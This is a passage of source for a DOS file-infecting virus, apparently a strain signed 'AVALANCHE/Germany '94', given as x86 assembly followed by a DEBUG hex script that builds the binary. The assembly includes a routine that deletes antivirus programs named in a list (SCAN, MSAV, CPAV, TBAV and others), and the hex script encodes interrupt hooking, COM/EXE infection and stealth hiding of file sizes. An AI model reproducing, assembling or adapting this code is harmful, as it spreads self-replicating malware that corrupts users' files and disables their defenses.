db "SCAN",0
db "MSAV",0
db "CPAV",0
db "TBME",0
db "TBFI",0
db "TBSC",0
db "VIRS",0
db "TBDR",0
db 0
fuck_scanner PROC NEAR
call pushall
push cs ; ES=CS
pop es
mov ax,cs:[nam_seg] ; get filename
mov ds,ax ; to DS:SI
mov si,cs:[nam_off]
fd_end: inc si
cmp byte ptr ds:[si],0 ; find last char
jne fd_end
fc2: dec si ; set pointer to filename
cmp byte ptr ds:[si-1],"\"
jne fc2
mov cx,4
mov di,offset scanner
call search ; search for scanner
jae fuckend
gotcha: mov dx,si
mov ah,41h ; delete scanner
call cs:[OrgDos]
fuckend: call popall
fuck_scanner ENDP
; compare a string with a list of strings
; INPUT: DS:SI string to find
; es:di list
; cx number of bytes to compare
; OUPUT: C=1 if string was found
; DX position of string
search PROC NEAR
mov ax,cx ; store cx
xor dx,dx
comp: mov cx,ax
push si ; store SI (pointer to reference)
repe cmpsb ; compare strings
pop si
jz treffer ; Z=1 -> string found
s_str: cmp byte ptr es:[di],0 ; find start of next string in list
je str_gef
inc di
jmp short s_str
str_gef: inc di
cmp byte ptr es:[di],0 ; end of list ?
je failed
inc dx
jmp short comp
treffer: stc
failed: clc
search ENDP
pushall proc near
pop cs:[ret_off]
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push cs:[ret_off]
pushall endp
popall proc near
pop cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
push cs:[ret_off]
popall endp
vor_header equ this byte
orig_exehead db 1ch dup (?) ; position of original exe header
virende equ this byte
code ends
end start
E 0100 66 B9 F0 0A 00 00 BB 1D 02 EB 06 EA 2E 80 37 00
E 0110 43 E2 F9 E8 00 00 58 8B E8 81 ED 16 01 EB 01 81
E 0120 EB 58 20 41 56 41 4C 41 4E 43 48 45 2F 47 65 72
E 0130 6D 61 6E 79 20 27 39 34 2E 2E 2E 4D 65 74 61 6C
E 0140 20 4A 75 6E 6B 69 65 20 67 72 65 65 74 73 20 4E
E 0150 65 75 72 6F 62 61 73 68 65 72 00 00 00 00 00 00
E 0160 FE FF 00 00 00 10 00 01 00 00 C3 00 01 E9 00 00
E 0170 00 00 00 00 00 00 00 01 00 00 FA 8C 9E 5C 01 FC
E 0180 0E 1F B8 F0 4B 33 FF CD 21 81 FF 68 73 75 03 E9
E 0190 50 01 B4 30 CD 21 3C 05 73 03 E9 45 01 B4 04 CD
E 01A0 1A 72 0E 81 F9 96 19 73 08 80 FE 01 73 03 E9 31
E 01B0 01 E8 46 01 B4 0E B2 AD CD 21 3C BA 75 4A E9 21
E 01C0 01 8B 86 5C 01 8E D8 8E C0 80 BE 77 01 01 74 1F
E 01D0 8C C0 03 86 5A 01 05 10 00 89 86 68 01 8B A6 60
E 01E0 01 8C C0 2E 03 86 62 01 05 10 00 8E D0 EB 07 8C
E 01F0 C8 2E 89 86 68 01 33 C0 8B D8 8B C8 8B D0 8B F0
E 0200 8B F8 FB 2E FF AE 66 01 8B 86 5C 01 8E C0 8B 9E
E 0210 64 01 B4 4A CD 21 73 03 E9 C7 00 0E 07 C6 86 26
E 0220 04 00 C6 86 25 04 00 B8 00 58 CD 21 89 86 74 01
E 0230 B8 02 58 CD 21 73 03 E9 A8 00 88 86 76 01 B8 01
E 0240 58 BB 02 00 CD 21 B8 03 58 BB 00 00 CD 21 BB D7
E 0250 00 B4 48 CD 21 72 65 50 48 8E C0 40 26 C7 06 00
E 0260 00 5A 00 26 C7 06 01 00 08 00 B8 21 35 CD 21 89
E 0270 9E 05 04 8C 86 07 04 89 9E 0D 04 8C 86 0F 04 E8
E 0280 C3 00 3D FF 00 74 08 8C 86 0F 04 89 86 0D 04 B8
E 0290 13 35 CD 21 89 9E 09 04 8C 86 0B 04 07 06 BE 00
E 02A0 01 03 F5 BF 00 01 B9 02 0B F3 A4 BA 31 04 B8 21
E 02B0 25 1F CD 21 BA BD 07 B8 13 25 CD 21 0E 1F FF B6
E 02C0 5C 01 07 BB FF FF B4 4A CD 21 B4 4A CD 21 8A 9E
E 02D0 76 01 32 FF B8 03 58 CD 21 8B 9E 74 01 B8 01 58
E 02E0 CD 21 80 BE 77 01 01 75 0E 8B BE 66 01 BE 6A 01
E 02F0 03 F5 B9 03 00 F3 A4 E9 C7 FE 06 50 53 51 52 56
E 0300 57 B8 00 FA BA 45 59 CD 16 81 FF 59 45 75 17 B8
E 0310 02 FA BA 45 59 B3 00 CD 16 80 E1 17 8A D9 B8 02
E 0320 FA BA 45 59 CD 16 1E 33 C0 8E D8 C4 36 84 00 1F
E 0330 26 8B 04 3D EB 05 75 05 26 C7 04 90 90 5F 5E 5A
E 0340 59 5B 58 07 C3 B4 52 CD 21 72 75 26 8B 47 FE 89
E 0350 86 CF 03 33 C0 8E C0 26 C4 06 04 00 89 86 C6 03
E 0360 8C 86 C8 03 2E C6 86 CE 03 00 2E 89 AE D7 03 FA
E 0370 33 C0 8E C0 BB D1 03 03 DD 26 89 1E 04 00 26 8C
E 0380 0E 06 00 FB 9C 58 80 CC 01 50 9D B4 0B FA 9C 2E
E 0390 FF 9E 05 04 9C 58 25 FF FE 50 9D FA 1E 33 C0 8E
E 03A0 D8 2E C4 86 C6 03 A3 04 00 8C 06 06 00 1F FB 80
E 03B0 BE CE 03 01 75 0B 8B 86 CC 03 8E C0 8B 86 CA 03
E 03C0 C3 B8 FF 00 EB FA 00 00 00 00 00 00 00 00 00 00
E 03D0 00 55 8B EC 50 56 BE 00 00 8B 46 04 2E 3B 84 CF
E 03E0 03 76 04 5E 58 5D CF 2E 89 84 CC 03 8B 46 02 2E
E 03F0 89 84 CA 03 2E C6 84 CE 03 01 81 66 06 FF FE EB
E 0400 E2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0420 00 00 00 00 00 00 00 2A 2E 63 6F 6D 00 FB B0 03
E 0430 CF 80 FC 4B 75 1E 3C F0 74 11 3C 05 74 11 3C 03
E 0440 74 0D 2E C6 06 23 04 00 E9 77 03 BF 68 73 CF 2E
E 0450 FF 2E 05 04 2E 80 3E 25 04 01 74 3A 2E 80 3E 26
E 0460 04 01 74 32 80 FC 4E 75 02 EB 30 80 FC 4F 75 02
E 0470 EB 29 80 FC 11 74 5F 80 FC 12 74 5A EB 00 3D 00
E 0480 57 75 03 E9 A6 00 80 FC 42 75 03 E9 BF 00 80 FC
E 0490 3F 75 03 E9 F4 00 2E FF 2E 05 04 9C 2E FF 1E 05
E 04A0 04 72 02 EB 03 CA 02 00 E8 11 07 B4 2F CD 21 26
E 04B0 8B 47 18 25 00 FE B1 09 D3 E8 3D 5A 00 76 11 26
E 04C0 81 6F 1A 02 0B 26 83 5F 1C 00 26 81 6F 18 00 C8
E 04D0 E8 FE 06 CA 02 00 9C 2E FF 1E 05 04 E8 DD 06 3C
E 04E0 FF 75 02 EB 41 B4 2F CD 21 26 80 3F FF 74 08 BE
E 04F0 19 00 BF 1D 00 EB 06 BE 20 00 BF 24 00 26 8B 00
E 0500 25 00 FE B1 09 D3 E8 3D 5A 00 76 1A 26 81 29 02
E 0510 0B 26 83 59 02 00 26 81 69 F9 02 0B 26 83 59 FB
E 0520 00 26 81 28 00 C8 E8 A8 06 CA 02 00 9C 2E FF 1E
E 0530 05 04 9C 50 51 8B C2 25 00 FE B1 09 D3 E8 3D 5A
E 0540 00 76 04 81 EA 00 C8 59 58 9D CA 02 00 3C 02 75
E 0550 18 0B CA 75 14 E8 AA 05 73 0F B9 FF FF BA FE F4
E 0560 9C 2E FF 1E 05 04 CA 02 00 2E FF 2E 05 04 00 00
E 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0580 00 00 00 00 00 00 00 00 00 00 83 FB 05 73 02 EB
E 0590 40 E8 6E 05 73 3B 2E 8C 1E 80 05 0E 1F A3 82 05
E 05A0 89 1E 6E 05 89 0E 70 05 89 16 86 05 8C 06 7E 05
E 05B0 EB 44 2E 8B 0E 70 05 2E 8B 1E 6E 05 2E 8B 16 86
E 05C0 05 2E A1 7E 05 8E C0 2E A1 80 05 8E D8 2E A1 82
E 05D0 05 2E FF 2E 05 04 2E 8B 0E 70 05 2E 8B 16 86 05
E 05E0 2E 8B 1E 7E 05 8E C3 2E 8B 1E 80 05 8E DB 2E 8B
E 05F0 1E 6E 05 CA 02 00 B8 01 42 33 C9 33 D2 9C 2E FF
E 0600 1E 05 04 72 AD A3 72 05 89 16 74 05 03 06 70 05
E 0610 83 D2 00 A3 76 05 89 16 78 05 B8 02 42 33 C9 33
E 0620 D2 9C 2E FF 1E 05 04 2D 02 0B 83 DA 00 A3 7A 05
E 0630 89 16 7C 05 B8 00 42 8B 0E 74 05 8B 16 72 05 9C
E 0640 2E FF 1E 05 04 73 03 E9 68 FF A1 72 05 3D 1D 00
E 0650 72 11 8B 1E 74 05 C4 0E 7A 05 8C C2 E8 28 01 72
E 0660 20 EB 35 C4 06 76 05 8C C3 33 D2 B9 1D 00 E8 16
E 0670 01 72 2C C4 0E 7A 05 8C C2 E8 0B 01 72 5E E9 D5
E 0680 00 C4 06 76 05 8C C3 C4 0E 7A 05 8C C2 E8 F7 00
E 0690 72 03 E9 D0 00 E9 CA 00 B8 00 00 F8 E9 37 FF BA
E 06A0 1C 00 2B 16 72 05 52 F7 DA B9 FF FF B0 02 E8 F8
E 06B0 00 8B 16 86 05 8B 0E 70 05 8B 1E 6E 05 B4 3F FF
E 06C0 36 80 05 1F 9C 2E FF 1E 05 04 0E 1F 8B 0E 78 05
E 06D0 8B 16 76 05 B0 00 E8 D0 00 E9 FA FE 8B 0E 70 05
E 06E0 8B 1E 6E 05 8B 16 86 05 FF 36 80 05 1F B4 3F 9C
E 06F0 2E FF 1E 05 04 73 03 E9 DC FE 0E 1F A3 88 05 BA
E 0700 1C 00 2B 16 72 05 52 F7 DA B9 FF FF B0 02 E8 98
E 0710 00 73 03 59 EB 7E 59 FF 36 80 05 58 8B 16 86 05
E 0720 03 16 72 05 15 00 00 8E D8 2E 8B 1E 6E 05 B4 3F
E 0730 9C 2E FF 1E 05 04 73 02 EB 5A 0E 1F 8B 0E 74 05
E 0740 8B 16 72 05 03 16 88 05 83 D1 00 32 C0 E8 59 00
E 0750 A1 88 05 E9 80 FE A1 7A 05 2B 06 72 05 8B C8 E9
E 0760 7E FF E9 4D FE 8B 0E 7A 05 2B 0E 72 05 51 8B 1E
E 0770 6E 05 8B 16 86 05 B4 3F FF 36 80 05 1F 9C 2E FF
E 0780 1E 05 04 59 E9 6C FE 3B DA 77 08 72 06 3B C1 77
E 0790 02 72 00 C3 2E 8B 16 72 05 2E 8B 0E 74 05 32 C0
E 07A0 E8 06 00 33 C0 F8 E9 2D FE 50 53 52 B4 42 2E 8B
E 07B0 1E 6E 05 9C 2E FF 1E 05 04 5A 5B 58 C3 2E FF 2E
E 07C0 09 04 E8 F7 03 2E C6 06 23 04 00 2E C6 06 26 04
E 07D0 00 E8 26 FB EB 09 E8 E3 03 2E C6 06 23 04 01 2E
E 07E0 89 16 11 04 2E 8C 1E 13 04 2E C6 06 24 04 00 1E
E 07F0 52 E8 5B 02 5A 1F B8 00 43 CD 21 73 03 E9 B0 00
E 0800 2E 89 0E 1D 04 F7 C1 04 00 74 03 E9 A2 00 B8 01
E 0810 43 83 E1 FE 9C 2E FF 1E 05 04 73 03 E9 8E 00 E8
E 0820 40 03 B8 00 3D 9C 2E FF 1E 05 04 73 02 EB 7E 8B
E 0830 D8 0E 1F 89 1E 1F 04 53 B8 20 12 CD 2F 26 8A 05
E 0840 8A D8 B8 16 12 CD 2F 5B 73 02 EB 56 26 C7 45 02
E 0850 02 00 E8 AD 02 73 02 EB 49 BA 00 00 B9 1C 00 B4
E 0860 3F CD 21 72 3D 8B F2 B9 1C 00 BF E6 0B 0E 07 F3
E 0870 A4 B8 02 42 33 C9 33 D2 9C 2E FF 1E 05 04 73 02
E 0880 EB 20 A3 70 01 89 16 72 01 2E 81 3E 00 00 4D 5A
E 0890 75 05 E8 ED 00 EB 0B 81 3E 70 01 30 F2 77 03 E8
E 08A0 64 00 E8 28 00 B4 3E 9C 2E FF 1E 0D 04 E8 3E 00
E 08B0 E8 BE 01 2E 80 3E 23 04 01 74 08 E8 13 03 2E FF
E 08C0 2E 05 04 2E C6 06 23 04 00 E8 05 03 C3 B8 01 57
E 08D0 8B 1E 1F 04 8B 0E 1B 04 8B 16 19 04 80 3E 24 04
E 08E0 01 75 04 81 C2 00 C8 9C 2E FF 1E 0D 04 C3 8B 0E
E 08F0 1D 04 B8 01 43 8B 16 11 04 8B 1E 13 04 53 1F 9C
E 0900 2E FF 1E 0D 04 C3 2E A1 02 00 80 FC FF 74 72 3C
E 0910 FF 74 6E 8B 1E 70 01 83 EB 03 89 1E 6E 01 B8 00
E 0920 42 2E 8B 1E 1F 04 33 D2 33 C9 9C 2E FF 1E 0D 04
E 0930 72 4F B4 40 B9 03 00 BA 6D 01 9C 2E FF 1E 0D 04
E 0940 72 3F B8 02 42 33 D2 33 C9 9C 2E FF 1E 0D 04 72
E 0950 30 C7 06 66 01 00 01 C6 06 77 01 01 2E A1 00 00
E 0960 A3 6A 01 2E A0 02 00 A2 6C 01 C7 06 64 01 00 10
E 0970 A1 70 01 05 13 01 A3 07 01 E8 1C 01 C6 06 24 04
E 0980 01 C3 0E 07 BE 00 00 83 7C 06 01 77 01 C3 80 7C
E 0990 18 40 75 01 C3 80 7C 1A 00 74 01 C3 8B 16 72 01
E 09A0 A1 70 01 E8 E1 00 40 3B 44 04 74 01 C3 8B 44 16
E 09B0 A3 5A 01 8B 44 0E A3 62 01 8B 44 10 A3 60 01 8B
E 09C0 44 14 A3 66 01 8B 16 72 01 A1 70 01 8B 5C 08 B1
E 09D0 04 D3 E3 2B C3 83 DA 00 8B D8 83 E3 0F 89 5C 14
E 09E0 B9 04 00 D1 FA D1 D8 E2 FA 89 44 0E 89 44 16 A3
E 09F0 64 01 C7 44 10 02 0C A1 70 01 8B 16 72 01 05 02
E 0A00 0D 83 D2 00 E8 80 00 89 5C 02 89 44 04 33 C9 BA
E 0A10 00 00 8B 1E 1F 04 B8 00 42 CD 21 72 31 B4 40 B9
E 0A20 1C 00 BA 00 00 9C 2E FF 1E 05 04 72 21 B8 02 42
E 0A30 33 D2 33 C9 CD 21 72 16 C6 06 77 01 00 8B 44 14
E 0A40 05 13 00 A3 07 01 E8 4F 00 C6 06 24 04 01 C3 E8
E 0A50 6A 01 0E 1F B8 24 35 CD 21 89 1E 01 04 8C 06 03
E 0A60 04 B8 24 25 BA 2D 04 9C 2E FF 1E 0D 04 E8 61 01
E 0A70 C3 E8 48 01 2E 8B 16 01 04 A1 03 04 8E D8 B8 24
E 0A80 25 CD 21 E8 4B 01 C3 8B D8 81 E3 FF 01 B9 09 00
E 0A90 F8 D1 EA D1 D8 E2 F9 C3 0E 07 FF 06 78 01 FC BA
E 0AA0 02 0B BE 00 01 8A 26 70 01 80 F4 AA 88 26 0F 01
E 0AB0 8A 26 70 01 80 F4 AA BF 00 00 33 C9 AC 81 FE 13
E 0AC0 01 76 08 81 FE E6 0B 77 02 32 C4 AA 41 81 F9 FA
E 0AD0 00 76 02 EB 04 3B CA 75 E3 2B D1 52 8B 1E 1F 04
E 0AE0 BA 00 00 B4 40 9C 2E FF 1E 05 04 5A 72 13 0B D2
E 0AF0 74 0F EB BC FF 0E 78 01 83 3E 78 01 20 75 02 EB
E 0B00 FE C3 53 50 51 52 B8 00 57 9C 2E FF 1E 05 04 2E
E 0B10 89 16 19 04 2E 89 0E 1B 04 81 E2 00 FE B1 09 D3
E 0B20 EA 83 FA 5A 72 06 F9 5A 59 58 5B C3 F8 EB F8 46
E 0B30 2D 50 52 00 54 42 41 56 00 53 43 41 4E 00 4D 53
E 0B40 41 56 00 43 50 41 56 00 54 42 4D 45 00 54 42 46
E 0B50 49 00 54 42 53 43 00 56 49 52 53 00 54 42 44 52
E 0B60 00 00 E8 57 00 0E 07 2E A1 13 04 8E D8 2E 8B 36
E 0B70 11 04 46 80 3C 00 75 FA 4E 80 7C FF 5C 75 F9 B9
E 0B80 04 00 BF 2F 0B E8 10 00 73 0A 8B D6 B4 41 9C 2E
E 0B90 FF 1E 0D 04 E8 3A 00 C3 8B C1 33 D2 FC 8B C8 56
E 0BA0 F3 A6 5E 74 13 26 80 3D 00 74 03 47 EB F7 47 26
E 0BB0 80 3D 00 74 05 42 EB E5 F9 C3 F8 C3 2E 8F 06 21
E 0BC0 04 9C 50 53 51 52 55 56 57 06 1E 2E FF 36 21 04
E 0BD0 C3 2E 8F 06 21 04 1F 07 5F 5E 5D 5A 59 5B 58 9D
E 0BE0 2E FF 36 21 04 C3